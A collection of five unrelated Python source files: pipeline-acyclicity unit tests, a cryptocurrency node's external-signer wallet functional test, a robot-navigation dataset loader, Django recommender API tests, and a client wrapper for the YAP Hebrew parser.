        self.assertEqual(self.pipeline, pipeline_with_circle)
    def test_insert_self_edges(self):
        """insert_self_edges adds the given self-loop flows back into the pipeline."""
        edges = {
            'self_edge0': {
                PWE.source: list(self.pipeline[PWE.activities].keys())[0],
                PWE.target: list(self.pipeline[PWE.activities].keys())[0],
            },
            'self_edge2': {
                PWE.source: list(self.pipeline[PWE.activities].keys())[1],
                PWE.target: list(self.pipeline[PWE.activities].keys())[1],
            }
        }
        normalize_run(self.pipeline)
        acyclic.insert_self_edges(self.pipeline, edges)
        normalize_undo(self.pipeline)
        # the inserted edges must now be part of the pipeline's flows
        edges.update(self.pipeline[PWE.flows])
        self.assertEqual(self.pipeline[PWE.flows], edges)
    def test_acyclic_run(self):
        """acyclic_run reverses the cycle-closing flow and returns the reversed flows."""
        normalize_run(self.pipeline)
        reversed_flows = acyclic.acyclic_run(self.pipeline)
        # build the expected pipeline: the known back edge is reversed in place
        assert_data = deepcopy(pipeline_with_circle)
        assert_flow = assert_data[PWE.flows]['line77a6cd587ff8476e75354c1d9469']
        assert_flows = {
            'line77a6cd587ff8476e75354c1d9469': deepcopy(assert_flow)
        }
        assert_data[PWE.activities][assert_flow[PWE.target]].update({
            PWE.incoming: ['linede15c52c74c1f5f566450d2c975a'],
            PWE.outgoing: ['line8602a85ef7e511765b77bc9f05e0', 'line77a6cd587ff8476e75354c1d9469']
        })
        assert_data[PWE.activities][assert_flow[PWE.source]].update({
            PWE.incoming: ['line7ac5fc7341c9ccbf773e9ca0c9cf', 'line77a6cd587ff8476e75354c1d9469'],
            PWE.outgoing: ''
        })
        assert_flow.update({
            PWE.source: assert_flow[PWE.target],
            PWE.target: assert_flow[PWE.source]
        })
        self.assertEqual(reversed_flows, assert_flows)
        normalize_undo(self.pipeline)
        self.assertEqual(self.pipeline, assert_data)
    def test_acyclic_undo(self):
        """acyclic_undo restores the flows reversed by acyclic_run."""
        normalize_run(self.pipeline)
        reversed_flows = acyclic.acyclic_run(self.pipeline)
        acyclic.acyclic_undo(self.pipeline, reversed_flows)
        normalize_undo(self.pipeline)
        self.assertEqual(self.pipeline, pipeline_with_circle)
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin and Qogecoin Core Authors
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test external signer.
Verify that a qogecoind node can use an external signer command
See also rpc_signer.py for tests without wallet context.
"""
import os
import platform
from test_framework.test_framework import QogecoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletSignerTest(QogecoinTestFramework):
    """Functional test for wallets backed by an external signer (driven by a mock signer script)."""
    def mock_signer_path(self):
        """Return the command that invokes the mock signer script ("py"-prefixed on Windows)."""
        path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'signer.py')
        if platform.system() == "Windows":
            return "py " + path
        else:
            return path
    def mock_invalid_signer_path(self):
        """Return the command that invokes the intentionally broken mock signer script."""
        path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'invalid_signer.py')
        if platform.system() == "Windows":
            return "py " + path
        else:
            return path
    def set_test_params(self):
        self.num_nodes = 2
        # The experimental syscall sandbox feature (-sandbox) is not compatible with -signer (which
        # invokes execve).
        self.disable_syscall_sandbox = True
        # node 0: plain; node 1: configured with the external (mock) signer
        self.extra_args = [
            [],
            [f"-signer={self.mock_signer_path()}", '-keypool=10'],
        ]
    def skip_test_if_missing_module(self):
        self.skip_if_no_external_signer()
        self.skip_if_no_wallet()
    def set_mock_result(self, node, res):
        """Write the result code the mock signer should return for node's next invocation."""
        with open(os.path.join(node.cwd, "mock_result"), "w", encoding="utf8") as f:
            f.write(res)
    def clear_mock_result(self, node):
        """Remove the forced mock signer result for node."""
        os.remove(os.path.join(node.cwd, "mock_result"))
    def run_test(self):
        self.test_valid_signer()
        # switch node 1 to the invalid signer for the failure-path test
        self.restart_node(1, [f"-signer={self.mock_invalid_signer_path()}", "-keypool=10"])
        self.test_invalid_signer()
    def test_valid_signer(self):
        """Exercise wallet creation, address derivation, display and spending via the mock signer."""
        self.log.debug(f"-signer={self.mock_signer_path()}")
        # Create new wallets for an external signer.
        # disable_private_keys and descriptors must be true:
        assert_raises_rpc_error(-4, "Private keys must be disabled when using an external signer", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=False, descriptors=True, external_signer=True)
        if self.is_bdb_compiled():
            assert_raises_rpc_error(-4, "Descriptor support must be enabled when using an external signer", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=True, descriptors=False, external_signer=True)
        else:
            assert_raises_rpc_error(-4, "Compiled without bdb support (required for legacy wallets)", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=True, descriptors=False, external_signer=True)
        self.nodes[1].createwallet(wallet_name='hww', disable_private_keys=True, descriptors=True, external_signer=True)
        hww = self.nodes[1].get_wallet_rpc('hww')
        assert_equal(hww.getwalletinfo()["external_signer"], True)
        # Flag can't be set afterwards (could be added later for non-blank descriptor based watch-only wallets)
        self.nodes[1].createwallet(wallet_name='not_hww', disable_private_keys=True, descriptors=True, external_signer=False)
        not_hww = self.nodes[1].get_wallet_rpc('not_hww')
        assert_equal(not_hww.getwalletinfo()["external_signer"], False)
        assert_raises_rpc_error(-8, "Wallet flag is immutable: external_signer", not_hww.setwalletflag, "external_signer", True)
        # assert_raises_rpc_error(-4, "Multiple signers found, please specify which to use", wallet_name='not_hww', disable_private_keys=True, descriptors=True, external_signer=True)
        # TODO: Handle error thrown by script
        # self.set_mock_result(self.nodes[1], "2")
        # assert_raises_rpc_error(-1, 'Unable to parse JSON',
        #     self.nodes[1].createwallet, wallet_name='not_hww2', disable_private_keys=True, descriptors=True, external_signer=False
        # )
        # self.clear_mock_result(self.nodes[1])
        # 3 descriptor types * keypool of 10 = 30 keys
        assert_equal(hww.getwalletinfo()["keypoolsize"], 30)
        # the mock signer produces deterministic addresses for each address type
        address1 = hww.getnewaddress(address_type="bech32")
        assert_equal(address1, "bcrt1qm90ugl4d48jv8n6e5t9ln6t9zlpm5th68x4f8g")
        address_info = hww.getaddressinfo(address1)
        assert_equal(address_info['solvable'], True)
        assert_equal(address_info['ismine'], True)
        assert_equal(address_info['hdkeypath'], "m/84'/1'/0'/0/0")
        address2 = hww.getnewaddress(address_type="p2sh-segwit")
        assert_equal(address2, "2N2gQKzjUe47gM8p1JZxaAkTcoHPXV6YyVp")
        address_info = hww.getaddressinfo(address2)
        assert_equal(address_info['solvable'], True)
        assert_equal(address_info['ismine'], True)
        assert_equal(address_info['hdkeypath'], "m/49'/1'/0'/0/0")
        address3 = hww.getnewaddress(address_type="legacy")
        assert_equal(address3, "n1LKejAadN6hg2FrBXoU1KrwX4uK16mco9")
        address_info = hww.getaddressinfo(address3)
        assert_equal(address_info['solvable'], True)
        assert_equal(address_info['ismine'], True)
        assert_equal(address_info['hdkeypath'], "m/44'/1'/0'/0/0")
        self.log.info('Test walletdisplayaddress')
        result = hww.walletdisplayaddress(address1)
        assert_equal(result, {"address": address1})
        # Handle error thrown by script
        self.set_mock_result(self.nodes[1], "2")
        assert_raises_rpc_error(-1, 'RunCommandParseJSON error',
            hww.walletdisplayaddress, address1
        )
        self.clear_mock_result(self.nodes[1])
        self.log.info('Prepare mock PSBT')
        self.nodes[0].sendtoaddress(address1, 1)
        self.generate(self.nodes[0], 1)
        # Load private key into wallet to generate a signed PSBT for the mock
        self.nodes[1].createwallet(wallet_name="mock", disable_private_keys=False, blank=True, descriptors=True)
        mock_wallet = self.nodes[1].get_wallet_rpc("mock")
        assert mock_wallet.getwalletinfo()['private_keys_enabled']
        result = mock_wallet.importdescriptors([{
            "desc": "wpkh([00000001/84'/1'/0']tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/0/*)#rweraev0",
            "timestamp": 0,
            "range": [0,1],
            "internal": False,
            "active": True
        },
        {
            "desc": "wpkh([00000001/84'/1'/0']tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/*)#j6uzqvuh",
            "timestamp": 0,
            "range": [0, 0],
            "internal": True,
            "active": True
        }])
        assert_equal(result[0], {'success': True})
        assert_equal(result[1], {'success': True})
        assert_equal(mock_wallet.getwalletinfo()["txcount"], 1)
        dest = self.nodes[0].getnewaddress(address_type='bech32')
        mock_psbt = mock_wallet.walletcreatefundedpsbt([], {dest:0.5}, 0, {}, True)['psbt']
        mock_psbt_signed = mock_wallet.walletprocesspsbt(psbt=mock_psbt, sign=True, sighashtype="ALL", bip32derivs=True)
        mock_psbt_final = mock_wallet.finalizepsbt(mock_psbt_signed["psbt"])
        mock_tx = mock_psbt_final["hex"]
        assert(mock_wallet.testmempoolaccept([mock_tx])[0]["allowed"])
        # # Create a new wallet and populate with specific public keys, in order
        # # to work with the mock signed PSBT.
        # self.nodes[1].createwallet(wallet_name="hww4", disable_private_keys=True, descriptors=True, external_signer=True)
        # hww4 = self.nodes[1].get_wallet_rpc("hww4")
        #
        # descriptors = [{
        #     "desc": "wpkh([00000001/84'/1'/0']tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/0/*)#x30uthjs",
        #     "timestamp": "now",
        #     "range": [0, 1],
        #     "internal": False,
        #     "watchonly": True,
        #     "active": True
        # },
        # {
        #     "desc": "wpkh([00000001/84'/1'/0']tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/*)#h92akzzg",
        #     "timestamp": "now",
        #     "range": [0, 0],
        #     "internal": True,
        #     "watchonly": True,
        #     "active": True
        # }]
        # result = hww4.importdescriptors(descriptors)
        # assert_equal(result[0], {'success': True})
        # assert_equal(result[1], {'success': True})
        assert_equal(hww.getwalletinfo()["txcount"], 1)
        assert(hww.testmempoolaccept([mock_tx])[0]["allowed"])
        # the mock signer returns this pre-signed PSBT when asked to sign
        with open(os.path.join(self.nodes[1].cwd, "mock_psbt"), "w", encoding="utf8") as f:
            f.write(mock_psbt_signed["psbt"])
        self.log.info('Test send using hww1')
        res = hww.send(outputs={dest:0.5},options={"add_to_wallet": False})
        assert(res["complete"])
        assert_equal(res["hex"], mock_tx)
        self.log.info('Test sendall using hww1')
        res = hww.sendall(recipients=[{dest:0.5}, hww.getrawchangeaddress()],options={"add_to_wallet": False})
        assert(res["complete"])
        assert_equal(res["hex"], mock_tx)
        # # Handle error thrown by script
        # self.set_mock_result(self.nodes[4], "2")
        # assert_raises_rpc_error(-1, 'Unable to parse JSON',
        #     hww4.signerprocesspsbt, psbt_orig, "00000001"
        # )
        # self.clear_mock_result(self.nodes[4])
    def test_invalid_signer(self):
        """A signer that emits invalid descriptors must make wallet creation fail."""
        self.log.debug(f"-signer={self.mock_invalid_signer_path()}")
        self.log.info('Test invalid external signer')
        assert_raises_rpc_error(-1, "Invalid descriptor", self.nodes[1].createwallet, wallet_name='hww_invalid', disable_private_keys=True, descriptors=True, external_signer=True)
# Run the external-signer wallet test when invoked as a script.
if __name__ == '__main__':
    WalletSignerTest().main()
|
from __future__ import print_function
import os
from semnav.config import get_config
from semnav.dataset.frame_by_frame_dataset import FrameByFrameDataset
from semnav.dataset.temporal_dataset import TemporalDataset
from semnav.dataset.graph_net_dataset import GraphNetDataset
from semnav.dataset.graph_net_frame_dataset import GraphNetFrameDataset
from torch.utils.data import ConcatDataset
def load_dataset(data_dir, cfg):
    """Build the Dataset object for one parsed rosbag directory.

    Args:
        data_dir: Full path to the data directory.
        cfg: Configuration.

    Raises:
        ValueError: If cfg.dataset_type is not a recognized dataset type.
    """
    print(' Loading:', data_dir)
    # Map each dataset type to a zero-arg factory. Lambdas defer attribute
    # access on cfg until the matching branch is actually selected, so a cfg
    # without temporal fields still works for the frame-based types.
    factories = {
        'frame_by_frame': lambda: FrameByFrameDataset(
            data_dir,
            first_n_in_sequence=cfg.first_n_frames,
            remove_last_n_in_sequence=cfg.remove_last_n_frames,
            behavior_ids=cfg.behavior_id,
            valid_only=cfg.valid_only),
        'temporal': lambda: TemporalDataset(
            data_dir,
            temporal_dilation=cfg.temporal_dilation,
            n_frames_per_sample=cfg.n_frames_per_sample,
            first_n_in_sequence=cfg.first_n_frames,
            remove_last_n_in_sequence=cfg.remove_last_n_frames,
            behavior_ids=cfg.behavior_id,
            valid_only=cfg.valid_only),
        'graph_net': lambda: GraphNetDataset(
            data_dir,
            temporal_dilation=cfg.temporal_dilation,
            n_frames_per_sample=cfg.n_frames_per_sample,
            first_n_in_sequence=cfg.first_n_frames,
            remove_last_n_in_sequence=cfg.remove_last_n_frames,
            behavior_ids=cfg.behavior_id,
            valid_only=cfg.valid_only),
        'single_frame_graph_net': lambda: GraphNetFrameDataset(
            data_dir,
            first_n_in_sequence=cfg.first_n_frames,
            remove_last_n_in_sequence=cfg.remove_last_n_frames,
            behavior_ids=cfg.behavior_id,
            valid_only=cfg.valid_only),
    }
    if cfg.dataset_type not in factories:
        raise ValueError('Please select a valid dataset type')
    return factories[cfg.dataset_type]()
def load_dataset_splits(bag_dir_name, cfg):
    """Return the (train, val, test) Datasets for one parsed bag directory.

    Args:
        bag_dir_name: Name of bag/directory under cfg.dataset_root.
        cfg: Configuration.
    """
    bag_root = os.path.join(cfg.dataset_root, bag_dir_name)
    # Each split lives in its own subdirectory of the bag directory.
    return tuple(
        load_dataset(os.path.join(bag_root, split), cfg)
        for split in ('train', 'val', 'test')
    )
def concat_datasets(bag_names, cfg):
    """Concatenate the train, val and test sets across parsed bag directories.

    Args:
        bag_names: List of bag/directory names under cfg.dataset_root.
        cfg: Configuration.

    Returns:
        Tuple of three ConcatDatasets: (train, val, test).
    """
    per_bag = [load_dataset_splits(name, cfg) for name in bag_names]
    # Regroup per-bag (train, val, test) tuples into per-split lists.
    train_sets = [splits[0] for splits in per_bag]
    val_sets = [splits[1] for splits in per_bag]
    test_sets = [splits[2] for splits in per_bag]
    return ConcatDataset(train_sets), ConcatDataset(val_sets), ConcatDataset(test_sets)
def merge_into_single_split(bag_names, cfg):
    """Collapse the train/val/test splits of the given bags into one Dataset.

    Each parsed bag directory has train/val/test subfolders; this merges the
    data from all three splits into a single torch dataset.
    """
    return ConcatDataset(list(concat_datasets(bag_names, cfg)))
def get_split_datasets(dataset_name):
    """Returns a train set, val set, and test set.

    Raises:
        ValueError: If dataset_name is not a known dataset.
    """
    print('loading dataset...')
    cfg = get_config()
    # Guard clause: only the v0.2 dataset layout is currently supported.
    if dataset_name != 'v0.2':
        print('Selected dataset: %s' % dataset_name)
        raise ValueError('Please use a valid dataset.')
    split_to_bags = {
        'train': [
            'v0.2/nav_area_1',
            'v0.2/nav_area_5b',
            'v0.2/nav_area_6',
        ],
        'val': [
            'v0.2/nav_area_3',
        ],
        'test': [
            'v0.2/nav_area_4',
        ],
    }
    train_set, val_set, test_set = (
        merge_into_single_split(split_to_bags[split], cfg)
        for split in ('train', 'val', 'test'))
    print('full dataset size:', len(train_set) + len(val_set) + len(test_set))
    print('train set size:', len(train_set))
    print('val set size:', len(val_set))
    print('test set size:', len(test_set))
    print('')
    return train_set, val_set, test_set
|
import pytest
from django.test import override_settings
from ozpcenter.recommend.recommend import RecommenderDirectory
from ozpcenter.scripts import sample_data_generator as data_gen
from ozpcenter.utils import shorthand_dict
from tests.ozp.cases import APITestCase
from tests.ozpcenter.helper import APITestHelper
@override_settings(ES_ENABLED=False)
class RecommenderTest(APITestCase):
    """Integration tests for RecommenderDirectory and the recommended-listings API.

    Fix: uses ``assertEqual`` throughout — the ``assertEquals`` alias is
    deprecated since Python 3.2 and removed in Python 3.12.
    """

    @classmethod
    def setUpTestData(cls):
        # Populate the test database once for the whole test class.
        data_gen.run()

    def setUp(self):
        # The expected lists below are long; show full diffs on failure.
        self.maxDiff = None

    def test_recommendation_baseline_graph(self):
        """Running baseline + graph recommenders yields combined, ordered scores."""
        recommender_wrapper_obj = RecommenderDirectory()
        actual_result = recommender_wrapper_obj.recommend('baseline,graph_cf')
        expected_result = {'Baseline': {}, 'Bookmark Collaborative Filtering': {}}
        self.assertEqual(actual_result, expected_result)

        url = '/api/storefront/recommended/?randomize=False'
        response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
        title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
        title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title']))  # Order can change between postgres and sqlite
        title_scores = shorthand_dict(title_scores)

        expected_result = [
            '(_score:(Baseline:(raw_score:8.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.0),title:White Horse)',
            '(_score:(Baseline:(raw_score:8.2,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.2),title:Navigation)',
            '(_score:(Baseline:(raw_score:8.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:13.5),title:Bleach)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:Informational Book)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:JotSpot)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:LocationLister)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:14.0),title:Stop sign)',
            '(_score:(Baseline:(raw_score:10.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:15.5),title:Killer Whale)',
            '(_score:(Baseline:(raw_score:11.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:16.5),title:Wolf Finder)',
            '(_score:(Baseline:(raw_score:11.5,weight:1.0),Bookmark Collaborative Filtering:(raw_score:2.0,weight:5.0),_sort_score:21.5),title:Chart Course)'
        ]
        self.assertEqual(expected_result, title_scores)

        # The endpoint itself must return listings in descending score order.
        sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
        self.assertEqual(sorted(sorted_scores, reverse=True), sorted_scores)

    def test_recommendation_baseline(self):
        """Running only the baseline recommender yields baseline-only scores."""
        recommender_wrapper_obj = RecommenderDirectory()
        actual_result = recommender_wrapper_obj.recommend('baseline')
        expected_result = {'Baseline': {}}
        self.assertEqual(actual_result, expected_result)

        url = '/api/storefront/recommended/?randomize=False'
        response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
        title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
        title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title']))  # Order can change between postgres and sqlite
        title_scores = shorthand_dict(title_scores)

        expected_result = [
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Bass Fishing)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Dragons)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:House Targaryen)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Informational Book)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:JotSpot)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:LocationLister)',
            '(_score:(Baseline:(raw_score:9.0,weight:1.0),_sort_score:9.0),title:Stop sign)',
            '(_score:(Baseline:(raw_score:10.5,weight:1.0),_sort_score:10.5),title:Killer Whale)',
            '(_score:(Baseline:(raw_score:11.5,weight:1.0),_sort_score:11.5),title:Chart Course)',
            '(_score:(Baseline:(raw_score:11.5,weight:1.0),_sort_score:11.5),title:Wolf Finder)'
        ]
        self.assertEqual(expected_result, title_scores)

        sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
        self.assertEqual(sorted(sorted_scores, reverse=True), sorted_scores)

    @pytest.mark.skip('TODO: failing for undetermined reason')
    def test_recommendation_graph(self):
        """Running only the graph recommender yields graph-only scores."""
        recommender_wrapper_obj = RecommenderDirectory()
        actual_result = recommender_wrapper_obj.recommend('graph_cf')
        expected_result = {'Bookmark Collaborative Filtering': {}}
        self.assertEqual(actual_result, expected_result)

        url = '/api/storefront/recommended/?randomize=False'
        response = APITestHelper.request(self, url, 'GET', username='wsmith', status_code=200)
        title_scores = [{'title': listing['title'], '_score': listing['_score']} for listing in response.data['recommended']]
        title_scores = sorted(title_scores, key=lambda k: (k['_score']['_sort_score'], k['title']))  # Order can change between postgres and sqlite
        title_scores = shorthand_dict(title_scores)

        expected_result = [
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Acoustic Guitar)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Bleach)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Bourbon)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:India Pale Ale)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Informational Book)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Internet meme)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Killer Whale)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Screamin Eagle CVO)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:1.0,weight:5.0),_sort_score:5.0),title:Snow)',
            '(_score:(Bookmark Collaborative Filtering:(raw_score:2.0,weight:5.0),_sort_score:10.0),title:Chart Course)'
        ]
        self.assertEqual(expected_result, title_scores)

        sorted_scores = [listing['_score']['_sort_score'] for listing in response.data['recommended']]
        self.assertEqual(sorted(sorted_scores, reverse=True), sorted_scores)
|
# Author: <NAME>
# Python Version: 3.6
## Copyright 2019 <NAME>
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
import pandas as pd
import numpy as np
import requests
import sys
import traceback
import csv
import re, string
from enums import *
from hebtokenizer import HebTokenizer
class YapApi(object):
    """
    Interface to Open University YAP (Yet another parser) https://github.com/OnlpLab/yap.
    This class is calling the GO based server, and:
    1. Wrap YAP in Python.
    2. Add tokenizer. Credit: Prof' <NAME>.
    3. Turn output CONLLU format to Dataframe & JSON.
    """
    def __init__(self):
        # No state is created here; per-run state is reset in init_data_items().
        pass
    def run(self, text:str, ip:str):
        """
        Clean, tokenize, split into sentences, and parse `text` via the YAP server.

        text: the text to be parsed.
        ip: YAP server IP, with port (default is 8000), if locally installed then 127.0.0.1:8000

        Returns a 6-tuple (tokenized_text, segmented_text, lemmas, dep_tree,
        md_lattice, ma_lattice); on any exception the error is printed and the
        method implicitly returns None.
        """
        try:
            print('Start Yap call')
            # Keep alpha-numeric and punctuations only.
            alnum_text=self.clean_text(text)
            # Tokenize...
            tokenized_text = HebTokenizer().tokenize(alnum_text)
            tokenized_text = ' '.join([word for (part, word) in tokenized_text])
            print("Tokens: {}".format(len(tokenized_text.split())))
            # Reset accumulators for this run.
            self.init_data_items()
            # Split to sentences for best performance.
            text_arr=self.split_text_to_sentences(tokenized_text)
            for i, sntnce_or_prgrph in enumerate( text_arr):
                # Actual call to YAP server
                rspns=self.call_yap(sntnce_or_prgrph, ip)
                print('End Yap call {} /{}'.format( i ,len(text_arr)-1))
                # Expose this code to print the results in CONLLU format
                #conllu_dict=self.print_in_conllu_format(rspns)
                # Turn CONLLU format to dataframe
                _dep_tree, _md_lattice, _ma_lattice=self.conllu_format_to_dataframe(rspns)
                _segmented_text= ' '.join( _dep_tree[yap_cols.word.name])
                _lemmas=' '.join(_dep_tree[yap_cols.lemma.name])
                # Accumulate this sentence's results into the run-level state.
                self.append_prgrph_rslts(_dep_tree, _md_lattice, _ma_lattice, _segmented_text, _lemmas)
            return tokenized_text, self.segmented_text, self.lemmas, self.dep_tree, self.md_lattice, self.ma_lattice
        except Exception as err:
            # NOTE(review): errors are swallowed and only printed; callers get None.
            print( sys.exc_info()[0])
            print( traceback.format_exc())
            print( str(err))
            print("Unexpected end of program")
    def split_text_to_sentences(self, tokenized_text):
        """
        Split tokenized text into sentences (on ! . ?), capping each chunk at
        150 tokens because YAP performs best sentence-by-sentence and dep_tree
        is limited to 256 nodes.
        """
        max_len=150
        arr=tokenized_text.strip().split()
        sentences=[]
        # Finding next sentence break.
        while (True):
            stop_points=[h for h in [i for i, e in enumerate(arr) if re.match(r"[!|.|?]",e)] ]
            if len(stop_points)>0:
                stop_point=min(stop_points)
                # Keep several sentence breakers as 1 unit, like "...." or "???!!!"
                while True:
                    stop_points.remove(stop_point)
                    if len(stop_points)>1 and min(stop_points)==(stop_point+1):
                        stop_point=stop_point+1
                    else:
                        break
                # Case there is no sentence break, and this split > MAX LEN:
                # chop into 140-token chunks so YAP never sees an over-long input.
                sntnc=arr[:stop_point+1]
                if len(sntnc) >max_len:
                    while(len(sntnc) >max_len):
                        sentences.append(" ".join(sntnc[:140]))
                        sntnc=sntnc[140:]
                    sentences.append(" ".join(sntnc))
                # Normal: sentence is less than 150 words...
                else:
                    sentences.append(" ".join(arr[:stop_point+1] ))
                arr=arr[stop_point+1:]
            else:
                break
        # Trailing words after the last sentence break form a final sentence.
        if len(arr)>0:
            sentences.append(" ".join(arr))
        return sentences
    def clean_text(self, text:str):
        """Keep Hebrew/Latin letters, whitespace and . , ! ? — replace all else
        with spaces, then collapse runs of spaces to a single space."""
        text=text.replace('\n', ' ').replace('\r', ' ')
        pattern= re.compile(r'[^א-ת\s.,!?a-zA-Z]')
        alnum_text =pattern.sub(' ', text)
        while(alnum_text.find('  ')>-1):
            alnum_text=alnum_text.replace('  ', ' ')
        return alnum_text
    def init_data_items(self):
        """Reset per-run accumulators that append_prgrph_rslts builds up."""
        self.segmented_text=""
        self.lemmas=""
        self.dep_tree=pd.DataFrame()
        self.md_lattice=pd.DataFrame()
        self.ma_lattice=pd.DataFrame()
    def append_prgrph_rslts(self, _dep_tree:pd.DataFrame, _md_lattice:pd.DataFrame, _ma_lattice:pd.DataFrame,
                            _segmented_text:str, _lemmas:str):
        """Append one sentence's parse results onto the run-level accumulators."""
        self.segmented_text="{} {}".format(self.segmented_text, _segmented_text).strip()
        self.lemmas="{} {}".format(self.lemmas, _lemmas).strip()
        self.dep_tree=pd.concat([self.dep_tree, _dep_tree])
        self.md_lattice=pd.concat([self.md_lattice, _md_lattice])
        self.ma_lattice=pd.concat([self.ma_lattice, _ma_lattice])
    def split_long_text(self, tokenized_text:str):
        """Split tokenized text into chunks of at most ~150 words, breaking at
        the first sentence terminator past the limit."""
        # Max num of words YAP can handle at one call.
        max_len=150
        arr=tokenized_text.split()
        rslt=[]
        while len(arr)> max_len:
            # Finding next sentence break.
            try:
                stop_point=min([h for h in [i for i, e in enumerate(arr) if re.match(r"[!|.|?]",e)] if h> max_len])
            except Exception as err:
                # No sentence break after max_len: cut at a fixed point instead.
                # NOTE(review): if a different exception is raised, stop_point
                # would be unbound below — verify this branch.
                if str(err) =="min() arg is an empty sequence":
                    stop_point=150
            if len(arr)<stop_point:
                stop_point=len(arr)-1
            rslt.append(" ".join(arr[: (stop_point+1)]))
            arr=arr[(stop_point+1):]
        rslt.append(" ".join(arr))
        return rslt
    def call_yap(self, text:str, ip:str):
        """
        Actual call to YAP HTTP Server. Returns the parsed JSON response.
        """
        url = "{}{}{}".format( "http://", ip, "/yap/heb/joint")
        # Request body is built by string concatenation, not json.dumps —
        # assumes `text` contains no double quotes (clean_text strips them).
        _json='{"text":" '+text+' "}'
        headers = {'content-type': 'application/json'}
        r = requests.post(url,
                          data=_json.encode('utf-8'),
                          headers={'Content-type': 'application/json; charset=utf-8'})
        self.check_response_status(r)
        return r.json()
    def check_response_status(self, response: requests.Response):
        """Print diagnostics for non-200 responses (does not raise)."""
        if response.status_code != 200:
            print('url: %s' %(response.url))
            if response.json() != None:
                print("response : {}".format( response.json()))
            if response.text != None:
                print('Reason: Text: %s'%( response.text))
    def conllu_format_to_dataframe(self, rspns:dict):
        """Convert the YAP response's dep_tree / md_lattice / ma_lattice CONLLU
        strings into DataFrames, filling missing values with -1.

        NOTE(review): assumes all three keys are present in rspns; otherwise
        the locals below would be unbound — verify against server contract.
        """
        for k,v in rspns.items():
            if k==yap_ent.dep_tree.name:
                dep_tree=self.parse_dep_tree(v)
            elif k==yap_ent.md_lattice.name:
                md_lattice=self.parse_md_lattice(v)
            elif k==yap_ent.ma_lattice.name:
                ma_lattice=self.parse_ma_lattice(v)
